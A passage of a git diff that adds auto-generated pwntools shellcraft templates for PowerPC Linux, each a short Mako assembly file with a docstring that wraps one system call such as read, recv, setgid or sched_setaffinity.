vararg)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/pause.asm b/pwnlib/shellcraft/templates/powerpc/linux/pause.asm new file mode 100644 index 000000000..399465b1b --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/pause.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall pause. See 'man 2 pause' for more information. + +Arguments: + + + + ${syscall('SYS_pause')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/pipe.asm b/pwnlib/shellcraft/templates/powerpc/linux/pipe.asm new file mode 100644 index 000000000..8e813fa6d --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/pipe.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pipedes"/> +<%docstring> +Invokes the syscall pipe. See 'man 2 pipe' for more information. + +Arguments: + pipedes(int): pipedes + + + ${syscall('SYS_pipe', pipedes)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/pipe2.asm b/pwnlib/shellcraft/templates/powerpc/linux/pipe2.asm new file mode 100644 index 000000000..4cabdb567 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/pipe2.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pipedes, flags"/> +<%docstring> +Invokes the syscall pipe2. See 'man 2 pipe2' for more information. + +Arguments: + pipedes(int): pipedes + flags(int): flags + + + ${syscall('SYS_pipe2', pipedes, flags)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/poll.asm b/pwnlib/shellcraft/templates/powerpc/linux/poll.asm new file mode 100644 index 000000000..531003872 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/poll.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fds, nfds, timeout"/> +<%docstring> +Invokes the syscall poll. See 'man 2 poll' for more information. + +Arguments: + fds(pollfd): fds + nfds(nfds_t): nfds + timeout(int): timeout + + + ${syscall('SYS_poll', fds, nfds, timeout)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/ppoll.asm b/pwnlib/shellcraft/templates/powerpc/linux/ppoll.asm new file mode 100644 index 000000000..a83606361 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/ppoll.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fds, nfds, timeout, ss"/> +<%docstring> +Invokes the syscall ppoll. See 'man 2 ppoll' for more information. + +Arguments: + fds(pollfd): fds + nfds(nfds_t): nfds + timeout(timespec): timeout + ss(sigset_t): ss + + + ${syscall('SYS_ppoll', fds, nfds, timeout, ss)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/prctl.asm b/pwnlib/shellcraft/templates/powerpc/linux/prctl.asm new file mode 100644 index 000000000..f54f5f577 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/prctl.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="option, vararg"/> +<%docstring> +Invokes the syscall prctl. See 'man 2 prctl' for more information. + +Arguments: + option(int): option + vararg(int): vararg + + + ${syscall('SYS_prctl', option, vararg)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/pread.asm b/pwnlib/shellcraft/templates/powerpc/linux/pread.asm new file mode 100644 index 000000000..55046bfb4 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/pread.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, buf, nbytes, offset"/> +<%docstring> +Invokes the syscall pread. See 'man 2 pread' for more information. + +Arguments: + fd(int): fd + buf(void): buf + nbytes(size_t): nbytes + offset(off_t): offset + + + ${syscall('SYS_pread', fd, buf, nbytes, offset)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/preadv.asm b/pwnlib/shellcraft/templates/powerpc/linux/preadv.asm new file mode 100644 index 000000000..5bbe78eda --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/preadv.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, iovec, count, offset"/> +<%docstring> +Invokes the syscall preadv. See 'man 2 preadv' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + offset(off_t): offset + + + ${syscall('SYS_preadv', fd, iovec, count, offset)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/prlimit64.asm b/pwnlib/shellcraft/templates/powerpc/linux/prlimit64.asm new file mode 100644 index 000000000..f082f59d5 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/prlimit64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pid, resource, new_limit, old_limit"/> +<%docstring> +Invokes the syscall prlimit64. See 'man 2 prlimit64' for more information. + +Arguments: + pid(pid_t): pid + resource(rlimit_resource): resource + new_limit(rlimit64): new_limit + old_limit(rlimit64): old_limit + + + ${syscall('SYS_prlimit64', pid, resource, new_limit, old_limit)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/profil.asm b/pwnlib/shellcraft/templates/powerpc/linux/profil.asm new file mode 100644 index 000000000..f9e7540c6 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/profil.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="sample_buffer, size, offset, scale"/> +<%docstring> +Invokes the syscall profil. See 'man 2 profil' for more information. + +Arguments: + sample_buffer(unsigned): sample_buffer + size(size_t): size + offset(size_t): offset + scale(unsigned): scale + + + ${syscall('SYS_profil', sample_buffer, size, offset, scale)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/ptrace.asm b/pwnlib/shellcraft/templates/powerpc/linux/ptrace.asm new file mode 100644 index 000000000..c1d18a562 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/ptrace.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="request, vararg"/> +<%docstring> +Invokes the syscall ptrace. See 'man 2 ptrace' for more information. + +Arguments: + request(ptrace_request): request + vararg(int): vararg + + + ${syscall('SYS_ptrace', request, vararg)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/putpmsg.asm b/pwnlib/shellcraft/templates/powerpc/linux/putpmsg.asm new file mode 100644 index 000000000..4a1c3a5cd --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/putpmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fildes, ctlptr, dataptr, band, flags"/> +<%docstring> +Invokes the syscall putpmsg. See 'man 2 putpmsg' for more information. + +Arguments: + fildes(int): fildes + ctlptr(strbuf): ctlptr + dataptr(strbuf): dataptr + band(int): band + flags(int): flags + + + ${syscall('SYS_putpmsg', fildes, ctlptr, dataptr, band, flags)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/pwrite.asm b/pwnlib/shellcraft/templates/powerpc/linux/pwrite.asm new file mode 100644 index 000000000..26b07fd67 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/pwrite.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, buf, n, offset"/> +<%docstring> +Invokes the syscall pwrite. See 'man 2 pwrite' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + offset(off_t): offset + + + ${syscall('SYS_pwrite', fd, buf, n, offset)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/pwritev.asm b/pwnlib/shellcraft/templates/powerpc/linux/pwritev.asm new file mode 100644 index 000000000..981d60886 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/pwritev.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, iovec, count, offset"/> +<%docstring> +Invokes the syscall pwritev. See 'man 2 pwritev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + offset(off_t): offset + + + ${syscall('SYS_pwritev', fd, iovec, count, offset)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/read.asm b/pwnlib/shellcraft/templates/powerpc/linux/read.asm new file mode 100644 index 000000000..dc1776723 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/read.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, buf, nbytes"/> +<%docstring> +Invokes the syscall read. See 'man 2 read' for more information. + +Arguments: + fd(int): fd + buf(void): buf + nbytes(size_t): nbytes + + + ${syscall('SYS_read', fd, buf, nbytes)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/readahead.asm b/pwnlib/shellcraft/templates/powerpc/linux/readahead.asm new file mode 100644 index 000000000..c5af1bb51 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/readahead.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, offset, count"/> +<%docstring> +Invokes the syscall readahead. See 'man 2 readahead' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_readahead', fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/readdir.asm b/pwnlib/shellcraft/templates/powerpc/linux/readdir.asm new file mode 100644 index 000000000..b2f872a0f --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/readdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="dirp"/> +<%docstring> +Invokes the syscall readdir. See 'man 2 readdir' for more information. + +Arguments: + dirp(DIR): dirp + + + ${syscall('SYS_readdir', dirp)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/readlink.asm b/pwnlib/shellcraft/templates/powerpc/linux/readlink.asm new file mode 100644 index 000000000..99eb246c9 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/readlink.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="path, buf, len"/> +<%docstring> +Invokes the syscall readlink. See 'man 2 readlink' for more information. + +Arguments: + path(char): path + buf(char): buf + len(size_t): len + + + ${syscall('SYS_readlink', path, buf, len)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/readlinkat.asm b/pwnlib/shellcraft/templates/powerpc/linux/readlinkat.asm new file mode 100644 index 000000000..2477bd688 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/readlinkat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, path, buf, len"/> +<%docstring> +Invokes the syscall readlinkat. See 'man 2 readlinkat' for more information. + +Arguments: + fd(int): fd + path(char): path + buf(char): buf + len(size_t): len + + + ${syscall('SYS_readlinkat', fd, path, buf, len)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/readv.asm b/pwnlib/shellcraft/templates/powerpc/linux/readv.asm new file mode 100644 index 000000000..3572ec2f1 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/readv.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, iovec, count"/> +<%docstring> +Invokes the syscall readv. See 'man 2 readv' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + + + ${syscall('SYS_readv', fd, iovec, count)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/recv.asm b/pwnlib/shellcraft/templates/powerpc/linux/recv.asm new file mode 100644 index 000000000..0046f4cf7 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/recv.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, buf, n, flags"/> +<%docstring> +Invokes the syscall recv. See 'man 2 recv' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + flags(int): flags + + + ${syscall('SYS_recv', fd, buf, n, flags)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/recvfrom.asm b/pwnlib/shellcraft/templates/powerpc/linux/recvfrom.asm new file mode 100644 index 000000000..ced45536c --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/recvfrom.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, buf, n, flags, addr, addr_len"/> +<%docstring> +Invokes the syscall recvfrom. See 'man 2 recvfrom' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + flags(int): flags + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_recvfrom', fd, buf, n, flags, addr, addr_len)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/recvmmsg.asm b/pwnlib/shellcraft/templates/powerpc/linux/recvmmsg.asm new file mode 100644 index 000000000..9a18b959f --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/recvmmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, vmessages, vlen, flags, tmo"/> +<%docstring> +Invokes the syscall recvmmsg. See 'man 2 recvmmsg' for more information. + +Arguments: + fd(int): fd + vmessages(mmsghdr): vmessages + vlen(unsigned): vlen + flags(int): flags + tmo(timespec): tmo + + + ${syscall('SYS_recvmmsg', fd, vmessages, vlen, flags, tmo)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/recvmsg.asm b/pwnlib/shellcraft/templates/powerpc/linux/recvmsg.asm new file mode 100644 index 000000000..fbd87e47d --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/recvmsg.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="fd, message, flags"/> +<%docstring> +Invokes the syscall recvmsg. See 'man 2 recvmsg' for more information. + +Arguments: + fd(int): fd + message(msghdr): message + flags(int): flags + + + ${syscall('SYS_recvmsg', fd, message, flags)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/remap_file_pages.asm b/pwnlib/shellcraft/templates/powerpc/linux/remap_file_pages.asm new file mode 100644 index 000000000..9625fcd5f --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/remap_file_pages.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="start, size, prot, pgoff, flags"/> +<%docstring> +Invokes the syscall remap_file_pages. See 'man 2 remap_file_pages' for more information. + +Arguments: + start(void): start + size(size_t): size + prot(int): prot + pgoff(size_t): pgoff + flags(int): flags + + + ${syscall('SYS_remap_file_pages', start, size, prot, pgoff, flags)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/rename.asm b/pwnlib/shellcraft/templates/powerpc/linux/rename.asm new file mode 100644 index 000000000..08128bf69 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/rename.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="old, new"/> +<%docstring> +Invokes the syscall rename. See 'man 2 rename' for more information. + +Arguments: + old(char): old + new(char): new + + + ${syscall('SYS_rename', old, new)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/renameat.asm b/pwnlib/shellcraft/templates/powerpc/linux/renameat.asm new file mode 100644 index 000000000..1c218f4e2 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/renameat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="oldfd, old, newfd, new"/> +<%docstring> +Invokes the syscall renameat. See 'man 2 renameat' for more information. + +Arguments: + oldfd(int): oldfd + old(char): old + newfd(int): newfd + new(char): new + + + ${syscall('SYS_renameat', oldfd, old, newfd, new)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/rmdir.asm b/pwnlib/shellcraft/templates/powerpc/linux/rmdir.asm new file mode 100644 index 000000000..b036d6b5d --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/rmdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall rmdir. See 'man 2 rmdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_rmdir', path)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sched_get_priority_max.asm b/pwnlib/shellcraft/templates/powerpc/linux/sched_get_priority_max.asm new file mode 100644 index 000000000..3d72212a3 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sched_get_priority_max.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_max. See 'man 2 sched_get_priority_max' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_max', algorithm)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sched_get_priority_min.asm b/pwnlib/shellcraft/templates/powerpc/linux/sched_get_priority_min.asm new file mode 100644 index 000000000..8f353141c --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sched_get_priority_min.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_min. See 'man 2 sched_get_priority_min' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_min', algorithm)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sched_getaffinity.asm b/pwnlib/shellcraft/templates/powerpc/linux/sched_getaffinity.asm new file mode 100644 index 000000000..22890acbd --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sched_getaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_getaffinity. See 'man 2 sched_getaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_getaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sched_getparam.asm b/pwnlib/shellcraft/templates/powerpc/linux/sched_getparam.asm new file mode 100644 index 000000000..61ecde15f --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sched_getparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_getparam. See 'man 2 sched_getparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_getparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sched_getscheduler.asm b/pwnlib/shellcraft/templates/powerpc/linux/sched_getscheduler.asm new file mode 100644 index 000000000..9125f0aa9 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sched_getscheduler.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall sched_getscheduler. See 'man 2 sched_getscheduler' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_sched_getscheduler', pid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sched_rr_get_interval.asm b/pwnlib/shellcraft/templates/powerpc/linux/sched_rr_get_interval.asm new file mode 100644 index 000000000..7ef4e46b1 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sched_rr_get_interval.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pid, t"/> +<%docstring> +Invokes the syscall sched_rr_get_interval. See 'man 2 sched_rr_get_interval' for more information. + +Arguments: + pid(pid_t): pid + t(timespec): t + + + ${syscall('SYS_sched_rr_get_interval', pid, t)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sched_setaffinity.asm b/pwnlib/shellcraft/templates/powerpc/linux/sched_setaffinity.asm new file mode 100644 index 000000000..00eee51d2 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sched_setaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_setaffinity. See 'man 2 sched_setaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_setaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sched_setparam.asm b/pwnlib/shellcraft/templates/powerpc/linux/sched_setparam.asm new file mode 100644 index 000000000..e41c518d8 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sched_setparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_setparam. See 'man 2 sched_setparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_setparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sched_setscheduler.asm b/pwnlib/shellcraft/templates/powerpc/linux/sched_setscheduler.asm new file mode 100644 index 000000000..9dc1e8359 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sched_setscheduler.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pid, policy, param"/> +<%docstring> +Invokes the syscall sched_setscheduler. See 'man 2 sched_setscheduler' for more information. + +Arguments: + pid(pid_t): pid + policy(int): policy + param(sched_param): param + + + ${syscall('SYS_sched_setscheduler', pid, policy, param)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sched_yield.asm b/pwnlib/shellcraft/templates/powerpc/linux/sched_yield.asm new file mode 100644 index 000000000..64afd85ba --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sched_yield.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sched_yield. See 'man 2 sched_yield' for more information. + +Arguments: + + + + ${syscall('SYS_sched_yield')} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/select.asm b/pwnlib/shellcraft/templates/powerpc/linux/select.asm new file mode 100644 index 000000000..a98a3d920 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/select.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="nfds, readfds, writefds, exceptfds, timeout"/> +<%docstring> +Invokes the syscall select. See 'man 2 select' for more information. + +Arguments: + nfds(int): nfds + readfds(fd_set): readfds + writefds(fd_set): writefds + exceptfds(fd_set): exceptfds + timeout(timeval): timeout + + + ${syscall('SYS_select', nfds, readfds, writefds, exceptfds, timeout)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sendfile.asm b/pwnlib/shellcraft/templates/powerpc/linux/sendfile.asm new file mode 100644 index 000000000..672c1a83d --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sendfile.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile. See 'man 2 sendfile' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sendfile64.asm b/pwnlib/shellcraft/templates/powerpc/linux/sendfile64.asm new file mode 100644 index 000000000..b49e355ab --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sendfile64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile64. See 'man 2 sendfile64' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile64', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setdomainname.asm b/pwnlib/shellcraft/templates/powerpc/linux/setdomainname.asm new file mode 100644 index 000000000..52a291608 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setdomainname.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall setdomainname. See 'man 2 setdomainname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_setdomainname', name, len)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setgid.asm b/pwnlib/shellcraft/templates/powerpc/linux/setgid.asm new file mode 100644 index 000000000..d89e5e8bc --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="gid"/> +<%docstring> +Invokes the syscall setgid. See 'man 2 setgid' for more information. + +Arguments: + gid(gid_t): gid + + + ${syscall('SYS_setgid', gid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setgroups.asm b/pwnlib/shellcraft/templates/powerpc/linux/setgroups.asm new file mode 100644 index 000000000..ffc1803af --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="n, groups"/> +<%docstring> +Invokes the syscall setgroups. See 'man 2 setgroups' for more information. + +Arguments: + n(size_t): n + groups(gid_t): groups + + + ${syscall('SYS_setgroups', n, groups)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/sethostname.asm b/pwnlib/shellcraft/templates/powerpc/linux/sethostname.asm new file mode 100644 index 000000000..6f2340bac --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/sethostname.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall sethostname. See 'man 2 sethostname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_sethostname', name, len)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setitimer.asm b/pwnlib/shellcraft/templates/powerpc/linux/setitimer.asm new file mode 100644 index 000000000..d62f4a514 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setitimer.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="which, new, old"/> +<%docstring> +Invokes the syscall setitimer. See 'man 2 setitimer' for more information. + +Arguments: + which(itimer_which_t): which + new(itimerval): new + old(itimerval): old + + + ${syscall('SYS_setitimer', which, new, old)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setpgid.asm b/pwnlib/shellcraft/templates/powerpc/linux/setpgid.asm new file mode 100644 index 000000000..039da552c --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setpgid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="pid, pgid"/> +<%docstring> +Invokes the syscall setpgid. See 'man 2 setpgid' for more information. + +Arguments: + pid(pid_t): pid + pgid(pid_t): pgid + + + ${syscall('SYS_setpgid', pid, pgid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setpriority.asm b/pwnlib/shellcraft/templates/powerpc/linux/setpriority.asm new file mode 100644 index 000000000..0fae8e17c --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setpriority.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="which, who, prio"/> +<%docstring> +Invokes the syscall setpriority. See 'man 2 setpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + prio(int): prio + + + ${syscall('SYS_setpriority', which, who, prio)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setregid.asm b/pwnlib/shellcraft/templates/powerpc/linux/setregid.asm new file mode 100644 index 000000000..6e4b336f6 --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setregid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="rgid, egid"/> +<%docstring> +Invokes the syscall setregid. See 'man 2 setregid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + + + ${syscall('SYS_setregid', rgid, egid)} diff --git a/pwnlib/shellcraft/templates/powerpc/linux/setresgid.asm b/pwnlib/shellcraft/templates/powerpc/linux/setresgid.asm new file mode 100644 index 000000000..39c44b6ec --- /dev/null +++ b/pwnlib/shellcraft/templates/powerpc/linux/setresgid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.powerpc.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall setresgid. See 'man 2 setresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_setresgid', rgid, egid, sgid)} diff --git 